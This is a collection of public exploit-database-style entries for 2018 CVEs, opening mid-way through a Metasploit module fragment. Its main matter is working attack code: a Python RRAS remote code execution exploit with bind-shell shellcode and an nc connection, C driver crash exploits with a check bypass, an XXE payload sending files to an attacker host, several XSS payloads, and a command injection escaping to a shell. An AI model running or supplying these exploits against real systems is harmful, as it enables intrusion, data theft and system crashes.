'method' => 'POST',
'vars_post' => data,
'headers' => {
'Connection': 'close',
'Cookie': cookie.to_s,
'Cmd': payload_b64
}
})
end
end
/*
Title: Dell Touchpad - ApMsgFwd.exe Denial Of Service
Author: Souhail Hammou
Vendor Homepage: https://www.alps.com/
Tested on : Alps Pointing-device Driver 10.1.101.207
CVE: CVE-2018-10828
*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
/*
Details:
==========
ApMsgFwd.exe belonging to Dell Touchpad, ALPS Touchpad driver, ALPS pointing-device for VAIO, Thinkpad Ultranav Driver ..etc
allows the current user to map and write to the "ApMsgFwd File Mapping Object" section.
ApMsgFwd.exe uses the data written to the section as arguments to functions.
This causes a denial of service condition when invalid pointers are written to the mapped section.
The crash :
===========
(b88.aa0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
KERNELBASE!MultiByteToWideChar+0x3d8:
00007ffc`06422e08 443830 cmp byte ptr [rax],r14b ds:d05d05d0`5d05d05d=??
0:004> r
rax=d05d05d05d05d05d rbx=00000000000004e4 rcx=000000007fffffff
rdx=0000000000000000 rsi=00000000ffffffff rdi=d05d05d05d05d05d
rip=00007ffc06422e08 rsp=000000000272fae0 rbp=000000000272fb59
r8=0000000000000000 r9=00000000ffffffff r10=0000000000000000
r11=000000000272fbc0 r12=00000000000001f4 r13=0000000000000000
r14=0000000000000000 r15=0000000000563e40
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
KERNELBASE!MultiByteToWideChar+0x3d8:
00007ffc`06422e08 443830 cmp byte ptr [rax],r14b ds:d05d05d0`5d05d05d=??
0:001> lm v m ApMsgFwd
Browse full module list
start end module name
00000000`00400000 00000000`00415000 ApMsgFwd (no symbols)
Loaded symbol image file: C:\Program Files\DellTPad\ApMsgFwd.exe
Image path: C:\Program Files\DellTPad\ApMsgFwd.exe
Image name: ApMsgFwd.exe
Browse all global symbols functions data
Timestamp: Tue Jul 1 09:03:05 2014 (53B27949)
CheckSum: 00020F5D
ImageSize: 00015000
File version: 8.1.0.44
Product version: 8.1.0.44
File flags: 0 (Mask 3F)
File OS: 40004 NT Win32
File type: 1.0 App
File date: 00000000.00000000
Translations: 0411.04b0
CompanyName: Alps Electric Co., Ltd.
ProductName: ApMsgFwd
InternalName: ApMsgFwd
OriginalFilename: ApMsgFwd.exe
ProductVersion: 8, 1, 0, 44
FileVersion: 8, 1, 0, 44
PrivateBuild: 8, 1, 0, 44
SpecialBuild: 8, 1, 0, 44
FileDescription: ApMsgFwd
LegalCopyright: Copyright (C) 2006-2014 Alps Electric Co., Ltd.
LegalTrademarks: Copyright (C) 2006-2014 Alps Electric Co., Ltd.
Comments: Copyright (C) 2006-2014 Alps Electric Co., Ltd.
*/
int main(int argc, char** argv)
{
HANDLE ApMpHnd,StartEvtHnd,KeyHnd;
PBYTE MappedBuf;
if ( ! (ApMpHnd = OpenFileMappingA(FILE_MAP_WRITE,FALSE,"ApMsgFwd File Mapping Object") ) )
{
printf("OpenFileMapping Failed !\n");
goto ret;
}
if ( ! ( MappedBuf = MapViewOfFile(ApMpHnd,FILE_MAP_WRITE,0,0,0x1A0) ) )
{
printf("MapViewOfFile Failed !\n");
goto cleanup_0;
}
StartEvtHnd = OpenEventA(EVENT_MODIFY_STATE,FALSE,"ApMsgFwd Event Start");
if ( ! StartEvtHnd )
{
printf("OpenEvent Failed !\n");
goto cleanup_1;
}
ZeroMemory(MappedBuf,0x1A0);
*MappedBuf = 9; //switch case 9
*(DWORD*)(MappedBuf + 0x60) = 0x5D05D05D;
*(DWORD*)(MappedBuf + 0x64) = 0xD05D05D0;
/*Wake up the waiting thread*/
SetEvent(StartEvtHnd);
CloseHandle(StartEvtHnd);
cleanup_1:
UnmapViewOfFile(MappedBuf);
cleanup_0:
CloseHandle(ApMpHnd);
ret:
return 0;
}
# Exploit Title: MyBB Latest Posts on Profile Plugin v1.1 - Cross-Site Scripting
# Date: 4/20/2018
# Author: 0xB9
# Contact: luxorforums.com/User-0xB9 or 0xB9[at]pm.me
# Software Link: https://community.mybb.com/mods.php?action=view&pid=914
# Version: 1.1
# Tested on: Ubuntu 17.10
# CVE: CVE-2018-10580
1. Description:
Adds a new section to user profiles that will display their last posts.
2. Proof of Concept:
Persistent XSS
- Create a thread with the following subject <script>alert('XSS')</script>
- Now visit your profile to see the alert.
3. Solution:
I reported the plugin twice over the past 3 weeks and recieved no response.
The following should be added in line 236 to properly sanitize thread subjects.
$d['tsubject'] = htmlspecialchars_uni($d['tsubject']);
[+] Exploit Title: ModbusPal XXE Injection
[+] Date: 05-08-2018
[+] Exploit Author: Trent Gordon
[+] Vendor Homepage: http://modbuspal.sourceforge.net/
[+] Software Link: https://sourceforge.net/projects/modbuspal/files/latest/download?source=files
[+] Version: 1.6b
[+] Tested on: Ubuntu 16.04 with Java 1.8.0_151
[+] CVE: CVE-2018-10832
1. Vulnerability Description
ModbusPal 1.6b is vulnerable to an XML External Entity (XXE) attack. Projects are saved as .xmpp files and automations can be exported as .xmpa files, both XML-based and vulnerable to XXE injection. Sending a crafted .xmpp or .xmpa file to a user, when opened/imported in ModbusPal 1.6b, will return the contents of any local files to a remote attacker.
2. Proof of Concept
a.) python -m SimpleHTTPServer 9999 (listening on ATTACKERS-IP and hosting evil.xml)
b.) Contents of hosted "evil.xml"
<!ENTITY % data SYSTEM "file:///etc/issue">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://ATTACKERS-IP:9999/?%data;'>">
c.) Example Exploited "xxe.xmpa"
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://ATTACKERS-IP:9999/evil.xml">
%sp;
%param1;
]>
<r>&exfil;</r>
<!DOCTYPE modbuspal_automation SYSTEM "modbuspal.dtd">
<modbuspal_automation>
<automation name="temp" step="1.0" loop="true" init="0.0">
</automation>
</modbuspal_automation>
3. Additional Details
Java 1.7 contains certain defenses against XXE, including throwing a java.net.MalformedURLException when certain characters (such as '/n') are included in a URL. This means that the file exfiltrated in the above attack is limited to single line files that dont contain any restricted characters. The above POC uses /etc/issue, which is one of the few common linux files that meets this criteria. Exploitation of this vulnerability on later versions of Java requires a more creative approach than described above, such as using FTP instead of URL to exfiltrate /etc/passwd.
# Exploit Title: Open-AudIT Community - 2.2.0 – Cross-Site Scripting
# Exploit Author: Tejesh Kolisetty #
# Vendor Homepage: https://opmantek.com/
# Software Link: https://opmantek.com/network-tools-download/
# Affected Version: 2.2.0
# Category: WebApps
# Tested on: Win7 Professional
# CVE : CVE-2018-10314
# 1. Vendor Description:
# Network Discovery and Inventory Software | Open-AudIT | Opmantek
# Discover what's on your network. Open-AudIT is the world's leading network discovery, inventory and audit program. Used by over 10,000 customers.
# 2. Technical Description:
# Cross-site scripting (XSS) vulnerability found in Multiple instances of Open-AudIT Community - 2.2.0 that allows remote attackers to inject arbitrary web script or HTML, as demonstrated in below POC.
# 3. Proof of Concept:
# a) Login as user who is having access to download scripts
# b) Navigate to Discover -> Audit Scripts -> List Scripts -> Download
# c) Now click Download any script
# d) Now capture the request using the Burp suit tool and append below payload to ‘action’ variable payload: =download"><script>alert(‘XSS’)</script>
# e) Then the script is executed on the browser and shows the popup.
# Multiple Instances:
Discover -> Audit Scripts -> List Scripts -> Download
Admin -> Logs -> View System Logs
Admin -> Logs -> View Access Logs
etc.,.
# 4. Solution:
# Upgrade to latest release Open-AudIT 2.2.1
# http://dl-openaudit.opmantek.com/OAE-Win-x86_64-release_2.2.1.exe
# Exploit Title: Open-AudIT Professional 2.1.1 – Multiple Cross-Site Scripting
# Exploit Author: Tejesh Kolisetty
# Vendor Homepage: https://opmantek.com/
# Software Link: https://opmantek.com/network-tools-download/
# Affected Version: 2.1.1
# Category: WebApps
# Tested on: Win7 Professional
# CVE : CVE-2018-9155
# 1. Vendor Description:
# Network Discovery and Inventory Software | Open-AudIT | Opmantek
# Discover what's on your network. Open-AudIT is the world's leading network discovery, inventory and audit program. Used by over 10,000 customers.
# 2. Technical Description:
# Cross-site scripting (XSS) vulnerability found in Multiple instances of
Open-AudIT Professional - 2.1.1 that allows remote attackers to inject
arbitrary web script or HTML, as demonstrated in below POC.
# 3. Proof of Concept:
# a) Login as user who is having Attributes Creation role
# b) Navigate to Manage -> Attributes -> Create Attributes
# c) Now fill the form with XSS payload in ‘Name’ field and submit payload: <script>alert('XSS')</script>
# d) Once the data is saved, the script get executed.
# Multiple Instances:
Admin -> Logs -> View System Logs
Manage -> Attributes -> Create Attributes
Manage -> Users -> Create Users
# 4. Solution:
# Clone with below Gits:
# https://github.com/Opmantek/open-audit/commit/aab685484446126a58a49b994ba5dfae6e92f4db#diff-e6d7b17fe09e809cb98cdf38b7f12638
# https://github.com/Opmantek/open-audit/commit/755a9af8895a9e28fac82d8add7012f77bb9a8d2
# Or Upgrade to latest release Open-AudIT Professional
# https://opmantek.com/network-tools-download/
# Exploit Title: [BSOD by IOCTL 0x002220e0 in 2345BdPcSafe.sys of 2345 Security Guard 3.7]
# Date: [20180509]
# Exploit Author: [anhkgg]
# Vendor Homepage: [http://safe.2345.cc/]
# Software Link: [http://dl.2345.cc/2345pcsafe/2345pcsafe_v3.7.0.9345.exe]
# Version: [v3.7] (REQUIRED)
# Tested on: [Windows X64]
# CVE : [CVE-2018- 10830]
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
struct NETFW_IOCTL_ADD_PID
{
DWORD pid;
char seed[0x14];//4 + 14
};//0x18
#pragma pack(push)
#pragma pack(1)
struct NETFW_IOCTL_SET_PID
{
BYTE set_state;//
WORD buf_len;//1
DWORD pid;//3
char buf[0x64];//7
};//6B
#pragma pack(pop)
int __stdcall f_XOR__12A30(BYTE *a1, BYTE *a2)
{
BYTE *a1_; // eax
a1_ = a1;
*a1_ ^= *a2;
*a2 ^= *a1;
*a1_ ^= *a2;
return (int)a1_;
}
int __stdcall sub_12A80(char *a1, int len, char *a3)
{
int result;
unsigned __int8 v4;
__int16 i;
__int16 j;
unsigned __int8 k;
for (i = 0; i < 256; ++i)
a3[i] = i;
a3[256] = 0;
a3[257] = 0;
k = 0;
v4 = 0;
result = 0;
for (j = 0; j < 256; ++j)
{
v4 += a3[j] + a1[k];
f_XOR__12A30((BYTE*)&a3[j], (BYTE*)&a3[v4]);
result = (k + 1) / len;
k = (k + 1) % len;
}
return result;
}
char *__stdcall sub_12B60(char *a1, signed int len, char *a3)
{
char *v3; // esi
unsigned int v4; // ebx
unsigned __int8 result; // al
int v6; // edi
char *v7; // ST18_4
int v8; // [esp+14h] [ebp-8h]
int v9; // [esp+18h] [ebp-4h]
unsigned __int8 v10; // [esp+2Fh] [ebp+13h]
v3 = a3;
v4 = a3[256];
result = a3[257];
v9 = 0;
if (len > 0)
{
v6 = (unsigned __int8)v4;
v8 = 0;
while (1)
{
v4 = (v6 + 1) & 0x800000FF;
v6 = (unsigned __int8)v4;
v10 = v3[(unsigned __int8)v4] + result;
v7 = &v3[v10];
f_XOR__12A30((BYTE*)&v3[(unsigned __int8)v4], (BYTE*)v7);
a1[v8] ^= v3[(unsigned __int8)(v3[(unsigned __int8)v4] + *v7)];
v8 = (signed __int16)++v9;
if ((signed __int16)v9 >= len)
break;
result = v10;
}
result = v10;
}
v3[256] = v4;
v3[257] = result;
return (char *)result;
}
void calc_seed(char* seed, char* dst)
{
char Source1[26] = { 0 };
char a3[300] = { 0 };
Source1[0] = 8;
Source1[1] = 14;
Source1[2] = 8;
Source1[3] = 10;
Source1[4] = 2;
Source1[5] = 3;
Source1[6] = 29;
Source1[7] = 23;
Source1[8] = 13;
Source1[9] = 3;
Source1[10] = 15;
Source1[11] = 22;
Source1[12] = 15;
Source1[13] = 7;
Source1[14] = 91;
Source1[15] = 4;
Source1[16] = 18;
Source1[17] = 26;
Source1[18] = 26;
Source1[19] = 3;
Source1[20] = 4;
Source1[21] = 1;
Source1[22] = 15;
Source1[23] = 25;
Source1[24] = 10;
Source1[25] = 13;
sub_12A80(seed, 0x14, a3);
sub_12B60(Source1, 0x1A, a3);
memcpy(dst, Source1, 26);
}
BOOL BypassChk(HANDLE h)
{
DWORD BytesReturned = 0;
DWORD ctlcode = 0x222090;
NETFW_IOCTL_ADD_PID add_pid = { 0 };
add_pid.pid = GetCurrentProcessId();
if (!DeviceIoControl(h, ctlcode, &add_pid, sizeof(NETFW_IOCTL_ADD_PID), &add_pid, sizeof(NETFW_IOCTL_ADD_PID), &BytesReturned, NULL)) {
printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());
return FALSE;
}
ctlcode = 0x222094;
NETFW_IOCTL_SET_PID set_pid = { 0 };
set_pid.pid = GetCurrentProcessId();
set_pid.set_state = 1;
calc_seed(add_pid.seed, set_pid.buf);
set_pid.buf_len = 26;
if (!DeviceIoControl(h, ctlcode, &set_pid, sizeof(NETFW_IOCTL_SET_PID), &set_pid, sizeof(NETFW_IOCTL_SET_PID), &BytesReturned, NULL)) {
printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());
return FALSE;
}
return TRUE;
}
HANDLE OpenDevice(char* path)
{
return CreateFileA(path,
GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
}
CHAR asciiString10[0x10];
CHAR asciiString100[0x100];
CHAR asciiString1000[0x1000];
WCHAR unicodeString10[0x10];
WCHAR unicodeString100[0x100];
WCHAR unicodeString1000[0x1000];
DWORD tableDwords[0x100];
DWORD FuzzConstants[] = {
0x00000000, 0x00000001, 0x00000004, 0xFFFFFFFF,
0x00001000, 0xFFFF0000, 0xFFFFFFFE, 0xFFFFFFF0,
0xFFFFFFFC, 0x70000000, 0x7FFEFFFF, 0x7FFFFFFF,
0x80000000,
(DWORD)asciiString10,
(DWORD)asciiString100,
(DWORD)asciiString1000,
(DWORD)unicodeString10,
(DWORD)unicodeString100,
(DWORD)unicodeString1000,
(DWORD)tableDwords
};
/* Period parameters */
#define N 624
#define M 397
#define MATRIX_A 0x9908b0dfUL /* constant vector a */
#define UPPER_MASK 0x80000000UL /* most significant w-r bits */
#define LOWER_MASK 0x7fffffffUL /* least significant r bits */
static unsigned long mt[N]; /* the array for the state vector */
static int mti = N + 1; /* mti==N+1 means mt[N] is not initialized */
/* initializes mt[N] with a seed */
void init_genrand(unsigned long s)
{
mt[0] = s & 0xffffffffUL;
for (mti = 1; mti < N; mti++) {
mt[mti] =
(1812433253UL * (mt[mti - 1] ^ (mt[mti - 1] >> 30)) + mti);
/* See Knuth TAOCP Vol2. 3rd Ed. P.106 for multiplier. */
/* In the previous versions, MSBs of the seed affect */
/* only MSBs of the array mt[]. */
/* 2002/01/09 modified by Makoto Matsumoto */
mt[mti] &= 0xffffffffUL;
/* for >32 bit machines */
}
}
/* generates a random number on [0,0xffffffff]-interval */
unsigned long genrand_int32(void)
{
unsigned long y;
static unsigned long mag01[2] = { 0x0UL, MATRIX_A };
/* mag01[x] = x * MATRIX_A for x=0,1 */
if (mti >= N) { /* generate N words at one time */
int kk;
if (mti == N + 1) /* if init_genrand() has not been called, */
init_genrand(5489UL); /* a default initial seed is used */
for (kk = 0; kk < N - M; kk++) {
y = (mt[kk] & UPPER_MASK) | (mt[kk + 1] & LOWER_MASK);
mt[kk] = mt[kk + M] ^ (y >> 1) ^ mag01[y & 0x1UL];
}
for (; kk < N - 1; kk++) {
y = (mt[kk] & UPPER_MASK) | (mt[kk + 1] & LOWER_MASK);
mt[kk] = mt[kk + (M - N)] ^ (y >> 1) ^ mag01[y & 0x1UL];
}
y = (mt[N - 1] & UPPER_MASK) | (mt[0] & LOWER_MASK);
mt[N - 1] = mt[M - 1] ^ (y >> 1) ^ mag01[y & 0x1UL];
mti = 0;
}
y = mt[mti++];
/* Tempering */
y ^= (y >> 11);
y ^= (y << 7) & 0x9d2c5680UL;
y ^= (y << 15) & 0xefc60000UL;
y ^= (y >> 18);
return y;
}
unsigned long getrand(unsigned long min, unsigned long max)
{
return (genrand_int32() % (max - min + 1)) + min;
}
//3.7.0.2860
int poc_2345NetFirewall()
{
DWORD BytesReturned = 0;
HANDLE h = OpenDevice("\\\\.\\2345BdPcSafe");
if (h == INVALID_HANDLE_VALUE) {
printf("[-] Open device error: %d\n", GetLastError());
return 1;
}
if (!BypassChk(h)) {
printf("[-] error!");
return 1;
}
DWORD ctlcode = 0x002220e0;
BYTE bufInput[0x10000] = { 0 };
BYTE bufOutput[0x10000] = { 0 };
srand(time(NULL));
int count = 0;
while (count++ < 1000) {
// Choose a random length for the buffer
size_t randomLength = getrand(4, 0x400);
for (int i = 0; i < randomLength; i = i + 4) {
int fuzzData = FuzzConstants[getrand(0, (sizeof(FuzzConstants) / 4) - 1)];
// Choose a random element into FuzzConstants
bufInput[i] = fuzzData & 0x000000ff;
bufInput[i + 1] = (fuzzData & 0x0000ff00) >> 8;
bufInput[i + 2] = (fuzzData & 0x00ff0000) >> 16;
bufInput[i + 3] = (fuzzData & 0xff000000) >> 24;
}
DeviceIoControl(h,
ctlcode,
bufInput,
randomLength,
bufOutput,
0,
&BytesReturned,
NULL);
Sleep(10);
}
return 0;
}
int main()
{
poc_2345NetFirewall();
printf("poc failed!\n");
getchar();
return 0;
}
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#Tested in Windows Server 2003 SP2 (ES) - Only works when RRAS service is enabled.
#The exploited vulnerability is an arbitraty pointer deference affecting the dwVarID field of the MIB_OPAQUE_QUERY structure.
#dwVarID (sent by the client) is used as a pointer to an array of functions. The application doest not check if the pointer is #pointing out of the bounds of the array so is possible to jump to specific portions of memory achieving remote code execution.
#Microsoft has not released a patch for Windows Server 2003 so consider to disable the RRAS service if you are still using
#Windows Server 2003.
#Exploit created by: Víctor Portal
#For learning purpose only
import struct
import sys
import time
import os
from threading import Thread
from impacket import smb
from impacket import uuid
from impacket import dcerpc
from impacket.dcerpc.v5 import transport
target = sys.argv[1]
print '[-]Initiating connection'
trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % target)
trans.connect()
print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % target
dce = trans.DCERPC_class(trans)
#RRAS DCE-RPC endpoint
dce.bind(uuid.uuidtup_to_bin(('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0')))
#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b "\x00" -f python
buf = ""
buf += "\xb8\x3c\xb1\x1e\x1d\xd9\xc8\xd9\x74\x24\xf4\x5a\x33"
buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x0e\x03\x7e\xbf\xfc"
buf += "\xe8\x82\x57\x82\x13\x7a\xa8\xe3\x9a\x9f\x99\x23\xf8"
buf += "\xd4\x8a\x93\x8a\xb8\x26\x5f\xde\x28\xbc\x2d\xf7\x5f"
buf += "\x75\x9b\x21\x6e\x86\xb0\x12\xf1\x04\xcb\x46\xd1\x35"
buf += "\x04\x9b\x10\x71\x79\x56\x40\x2a\xf5\xc5\x74\x5f\x43"
buf += "\xd6\xff\x13\x45\x5e\x1c\xe3\x64\x4f\xb3\x7f\x3f\x4f"
buf += "\x32\x53\x4b\xc6\x2c\xb0\x76\x90\xc7\x02\x0c\x23\x01"
buf += "\x5b\xed\x88\x6c\x53\x1c\xd0\xa9\x54\xff\xa7\xc3\xa6"
buf += "\x82\xbf\x10\xd4\x58\x35\x82\x7e\x2a\xed\x6e\x7e\xff"
buf += "\x68\xe5\x8c\xb4\xff\xa1\x90\x4b\xd3\xda\xad\xc0\xd2"
buf += "\x0c\x24\x92\xf0\x88\x6c\x40\x98\x89\xc8\x27\xa5\xc9"
buf += "\xb2\x98\x03\x82\x5f\xcc\x39\xc9\x37\x21\x70\xf1\xc7"
buf += "\x2d\x03\x82\xf5\xf2\xbf\x0c\xb6\x7b\x66\xcb\xb9\x51"
buf += "\xde\x43\x44\x5a\x1f\x4a\x83\x0e\x4f\xe4\x22\x2f\x04"
buf += "\xf4\xcb\xfa\xb1\xfc\x6a\x55\xa4\x01\xcc\x05\x68\xa9"
buf += "\xa5\x4f\x67\x96\xd6\x6f\xad\xbf\x7f\x92\x4e\xae\x23"
buf += "\x1b\xa8\xba\xcb\x4d\x62\x52\x2e\xaa\xbb\xc5\x51\x98"
buf += "\x93\x61\x19\xca\x24\x8e\x9a\xd8\x02\x18\x11\x0f\x97"
buf += "\x39\x26\x1a\xbf\x2e\xb1\xd0\x2e\x1d\x23\xe4\x7a\xf5"
buf += "\xc0\x77\xe1\x05\x8e\x6b\xbe\x52\xc7\x5a\xb7\x36\xf5"
buf += "\xc5\x61\x24\x04\x93\x4a\xec\xd3\x60\x54\xed\x96\xdd"
buf += "\x72\xfd\x6e\xdd\x3e\xa9\x3e\x88\xe8\x07\xf9\x62\x5b"
buf += "\xf1\x53\xd8\x35\x95\x22\x12\x86\xe3\x2a\x7f\x70\x0b"
buf += "\x9a\xd6\xc5\x34\x13\xbf\xc1\x4d\x49\x5f\x2d\x84\xc9"
buf += "\x6f\x64\x84\x78\xf8\x21\x5d\x39\x65\xd2\x88\x7e\x90"
buf += "\x51\x38\xff\x67\x49\x49\xfa\x2c\xcd\xa2\x76\x3c\xb8"
buf += "\xc4\x25\x3d\xe9"
#NDR format
stub = "\x21\x00\x00\x00" #dwPid = PID_IP (IPv4)
stub += "\x10\x27\x00\x00" #dwRoutingPID
stub += "\xa4\x86\x01\x00" #dwMibInEntrySize
stub += "\x41"*4 #_MIB_OPAQUE_QUERY pointer
stub += "\x04\x00\x00\x00" #dwVarID (_MIB_OPAQUE_QUERY)
stub += "\x41"*4 #rgdwVarIndex (_MIB_OPAQUE_QUERY)
stub += "\xa4\x86\x01\x00" #dwMibOutEntrySize
stub += "\xad\x0b\x2d\x06" #dwVarID ECX (CALL off_64389048[ECX*4]) -> p2p JMP EAX #dwVarID (_MIB_OPAQUE_QUERY)
stub += "\xd0\xba\x61\x41\x41" + "\x90"*5 + buf + "\x41"*(100000-10-len(buf)) #rgdwVarIndex (_MIB_OPAQUE_QUERY)
stub += "\x04\x00\x00\x00" #dwId (_MIB_OPAQUE_INFO)
stub += "\x41"*4 #ullAlign (_MIB_OPAQUE_INFO)
dce.call(0x1e, stub) #0x1d MIBEntryGetFirst (other RPC calls are also affected)
print "[-]Exploit sent to target successfully..."
print "Waiting for shell..."
time.sleep(5)
os.system("nc " + target + " 4444")
# Exploit Title: EMC RecoverPoint 4.3 - Admin CLI Command Injection
# Version: RecoverPoint prior to 5.1.1 RecoverPoint for VMs prior to 5.0.1.3
# Date: 2018-05-11
# Exploit Author: Paul Taylor
# Github: https://github.com/bao7uo
# Tested on: RecoverPoint for VMs 4.3, RecoverPoint 4.4.SP1.P1
# CVE: CVE-2018-1185
1. Description
An OS command injection vulnerability resulting in code execution as the built-in admin user.
A crafted entry can result in the ability to escape from the restricted admin user's menu driven CLI to a full Linux operating system shell in the context of the admin user. The attack vector is the trap destination (hostname/IP) parameter of the test_snmp function.
2. Proof of Concept
RecoverPoint> test_snmp
Enter the trap destination (host name or IP)
> /dev/null 2>&1 ; bash #
admin@RecoverPoint:/home/kos/cli$ exit
exit
Test completed successfully.
RecoverPoint>
3. Solution:
Update to latest version of RecoverPoint
# Exploit Title: WUZHI CMS 4.1.0 XSS Vulnerability
# Date: 2018-4-23
# Exploit Author: jiguang (s1@jiguang.in)
# Vendor Homepage: https://github.com/wuzhicms/wuzhicms
# Software Link: https://github.com/wuzhicms/wuzhicms
# Version: 4.1.0
# CVE: CVE-2018-10311
An issue was discovered in WUZHI CMS 4.1.0 (https://github.com/wuzhicms/wuzhicms/issues/131)
There is a xss vulnerability that can stealing administrator cookie, fishing attack, etc. via the tag[pinyin] parameter post to the /index.php?m=tags&f=index&v=add&&_su=wuzhicms&_menuid=?&_submenuid=?
`[POST /www/index.php?m=tags&f=index&v=add&&_su=wuzhicms&_menuid=95&_submenuid=101 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://localhost/www/index.php?m=tags&f=index&v=add&&_su=wuzhicms&_menuid=95&_submenuid=101
Content-Type: application/x-www-form-urlencoded
Content-Length: 270
Cookie: PHPSESSID=uk4g8bm4l96iv5rl6ej2re83a3; EkT_uid=c%2FzWH2EByNj%2Fm78WencnAg%3D%3D; EkT_username=oR5iColhZ3j6z343ib%2B9Lg%3D%3D; EkT_wz_name=LVeemy520l5DQnc4SQGtsw%3D%3D; EkT_siteid=Wl70z0XOgxO6TVPS70twsg%3D%3D; EkT_qkey=jiPLTZIrWUySV8FmwZwibPjlIPfq0nTj
Connection: close
Upgrade-Insecure-Requests: 1
tag%5Btag%5D=jiguang&tag%5Btitle%5D=jiguang&tag%5Bkeyword%5D=jiguang&tag%5Bdesc%5D=jiguang&tag%5Bisshow%5D=1&tag%5Blinkageid%5D=0&LK2_1=0&## tag%5Bpinyin%5D=ji%3Cimg%2Fsrc%3D1+onerror%3Dalert%28document.cookie%29%3E&tag%5Bletter%5D=&tag%5Burl%5D=&submit=%E6%8F%90+%E4%BA%A4](url)`
------------------
# Exploit Title: WUZHI CMS 4.1.0 XSS Vulnerability
# Date: 2018-4-23
# Exploit Author: jiguang (s1@jiguang.in)
# Vendor Homepage: https://github.com/wuzhicms/wuzhicms
# Software Link: https://github.com/wuzhicms/wuzhicms
# Version: 4.1.0
# CVE: CVE-2018-10313
An issue was discovered in WUZHI CMS 4.1.0 (https://github.com/wuzhicms/wuzhicms/issues/133)
There is a xss vulnerability that can stealing administrator cookie, fishing attack, etc. via the form%5Bqq_10%5D parameter post to the /index.php?m=member&f=index&v=profile&set_iframe=1
`POST /wuzhi/www/index.php?m=member&f=index&v=profile&set_iframe=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://localhost/wuzhi/www/index.php?m=member&f=index&v=profile&set_iframe=1 Content-Type: application/x-www-form-urlencoded Content-Length: 74 Cookie: PHPSESSID=uk4g8bm4l96iv5rl6ej2re83a3; EkT_siteid=Wl70z0XOgxO6TVPS70twsg%3D%3D; EkT_qkey=jiPLTZIrWUySV8FmwZwibPjlIPfq0nTj; EkT_userkeys=e7%2FCIDS8IFYxTUG8kAb7Ww%3D%3D; EkT_truename=yuduo; EkT_auth=lwMUjMOtAXpsQyZViV3zkNdoXMK7Up5NWRRI4Ro4FDKECQHhZ1ntK0WcBotqHVYyx3z9AYABYpAsEx4OdqcExF5S1d7Gw31AvtN07WdqMw28yLCoyNv8RA%3D%3D; EkT__uid=ocqUyYLd7bm05%2Ft4KcS%2B6Q%3D%3D; EkT__username=URDJ1YisL%2BXkt7Mzgg3aNA%3D%3D; EkT__groupid=aZR0cJTYiMBkLfoq8PwJ0g%3D%3D; EkT_modelid=10; tFf_uid=ej6BNn7ulZVYfrHwlgXMvg%3D%3D; tFf_username=YuhCykTKqrPt5fHl2zROVg%3D%3D; tFf_wz_name=IAFonn80xi%2FUvXNXx8uR%2FQ%3D%3D; tFf_siteid=dUi1cO%2FrqMr0atgyt9b%2BNw%3D%3D; tFf_auth=EVUCupGrAYuOzHKFNYqbS%2B39rd2Ynyn74kyNU3KlUwiQCJGQMAgEMU0go7SqkJsUA8kNZq6BsF5nFNbEeL5ehNOQ5DkCGZ4h4JnRqFB8UFIh9kWHsJe84Q%3D%3D; tFf__uid=FM0wd0X5ONWZsKHK8N3j%2Fw%3D%3D; tFf__username=haycqodNzDQbfpqnsWY3xA%3D%3D; tFf__groupid=I7EFExZnf2tvQCMhDV%2B1nA%3D%3D; tFf_truename=yuduo; tFf_modelid=10; SwW_uid=Bk1YojgAB4vSAv%2BmPy3WYg%3D%3D; SwW_username=BTEh6yj6GaEMdyByi0JOZw%3D%3D; SwW_wz_name=8vypKiZ6Ck1JQloRN3gGZQ%3D%3D; SwW_siteid=jm2uH%2FJAmU8uh1X4AlQ1nQ%3D%3D; SwW_qkey=sSAglhFB%2F04GAI1A3H4vDpnfBjktIjQO; SwW_truename=yuyuyu; SwW_auth=qVG8d0BqbIYaHf7emEsG%2Bz%2Fo4LTxYomIRzLjUyu1wWd0BfW4Eucw1UXVm3OTEBexHDGzzwvYarSW62r%2F%2BZrP6RZloFSgyn1%2B5QSsfVv8XDbbIN5Wzd32rQ%3D%3D; SwW__uid=SQgSrskOQqPeThE7vxpQuQ%3D%3D; SwW__username=ZnY2K%2B8IB6WgdsrHTD%2F%2Fzg%3D%3D; SwW__groupid=wVnor3QYe03CC%2B9JInwPIQ%3D%3D; SwW_modelid=10 Connection: close Upgrade-Insecure-Requests: 1
`form%5Bqq_10%5D`=234234" onmouseover="confirm(22)&submit=%E6%8F%90%E4%BA%A4`
------------------
# Exploit Title: XATABoost CMS Sql Injection
# Google Dork: inurl:php?id= Powered by XATABOOST
# Date: 02.01.2018
# Exploit Author: MgThuraMoeMyint
# Vendor Homepage: http://www2.xataboost.com
# Version: 1.0.0
# Tested on: Kali Linux
# SQL Injection Type: Union Based
# Example URL: http://localhost/news.php?id=[Injection Point]
